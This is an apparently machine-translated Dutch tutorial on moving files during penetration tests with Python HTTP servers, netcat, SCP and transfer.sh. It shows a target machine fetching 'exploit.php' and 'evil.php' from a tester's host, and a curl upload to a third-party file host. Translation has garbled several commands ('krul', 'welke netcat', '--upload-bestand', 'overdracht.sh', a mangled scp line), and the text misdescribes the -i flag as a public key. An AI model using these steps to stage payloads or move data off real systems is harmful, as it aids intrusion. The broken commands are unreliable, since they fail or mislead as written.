Het overdragen van exploits, python-scripts en laadmodules is vaak nodig tijdens penetratietestactiviteiten. Aangezien de terminal de tool is die het meest wordt gebruikt, is het essentieel om de basisprincipes van de bestandsoverdracht te begrijpen.
Een pentester moet goed zijn uitgerust met verschillende trucs om bestanden van een externe server en van de ene map naar de andere over te brengen. In deze zelfstudie bespreken we verschillende manieren om bestanden over te zetten met behulp van de opdrachtregel.
1. Python-server
Python is het basispakket dat vooraf is geïnstalleerd in bijna alle op Debian gebaseerde systemen. Ga als volgt te werk om een bestand van de ene machine naar de andere over te zetten;
Python2:
Schakel over naar de map waar uw bestand dat u wilt overzetten zich bevindt. Start een eenvoudige python-server. Voer de volgende opdracht in;
$ python -m SimpleHTTPServer 8080
Ga nu naar de machine waarnaar u het bestand wilt overbrengen. Gebruik de volgende opdracht om het bestand te downloaden;
$ wget http://192.168.43.177:8080/bestand
Vergeet niet om het IP, poortnummer en de naam van het bestand te vervangen.
Python3:
Alles wat in python2 is geschreven, zal bijna altijd breken in python3. Dus we kijken ook hoe je een bestand kunt overzetten met python3.
Voer in het geval van python3 de volgende opdracht in om een eenvoudige python-server te starten:.
$ python3 -m http.server 8080
Voer de volgende opdracht in om het bestand op het doel te downloaden;
$ wget http://192.168.43.177:8080/exploit.php
2. Netcat
Netcat is een krachtig hulpprogramma om bestanden van elke externe machine naar een lokale machine over te brengen. Het is mogelijk niet altijd geïnstalleerd. U kunt controleren of het bestaat of niet door in te voeren;
$ welke netcat
Als alternatief, door in te voeren;$ welke nc
Maak een netcat-server met het volgende commando;
$ nc -nlvp 8080 < evil.php
Ga nu naar de doelcomputer en voer het volgende in om het bestand te downloaden;
$ nc-nv 192.168.43.177 8080 > kwaad.php
Vervangen nc
met netcat
in de bovenstaande opdrachten als nc niet werkt of niet correct is geïnstalleerd.
3. SCP
Secure Copy Protocol is een krachtig hulpmiddel voor het overzetten van bestanden. Het is vooral handig als u mappen wilt overzetten. Het wordt ook meestal gebruikt voor bestandsoverdracht via ssh.
Voor bestandsoverdracht via ssh, voer de volgende opdracht in op de verzendende machine;
$ scp -ik nieuw.pem-test.py [email protected]:/home/ubuntu
Waar -i staat voor de publieke sleutel voor ssh login, test.py is het bestand dat moet worden overgedragen en /home/ubuntu is de doelmap waar we het bestand willen opslaan.
Voer de volgende opdracht in om een bestand van de externe machine te downloaden;
$ scp [email protected]:/remote_directory/file /local/directory
4. Overdracht.sh
U kunt deze tool van derden gebruiken om bestanden over te zetten. Het kan handig zijn als je geen machine hebt met een openbaar IP-adres en je de bestanden toch moet overzetten. De volgende opdracht uploadt het bestand naar de overdracht:.sh-servers;
$ curl --upload-bestand ./het dossier.txt https://overdracht.sh/bestand.tekst
Voer de volgende opdracht in om het bestand te downloaden;
$ krul https://overdracht.sh//bestand.txt -o bestand.tekst
Overdracht.sh is nog in ontwikkeling en werkt mogelijk niet altijd.
Conclusie
Opdrachtregelprogramma's geven ons de mogelijkheid om bestanden op verschillende manieren over te dragen. Ze lijken misschien een beetje ingewikkeld, maar als je ze in de praktijk brengt, kun je eenvoudig bestanden beheren, vooral wanneer een GUI-optie niet beschikbaar is.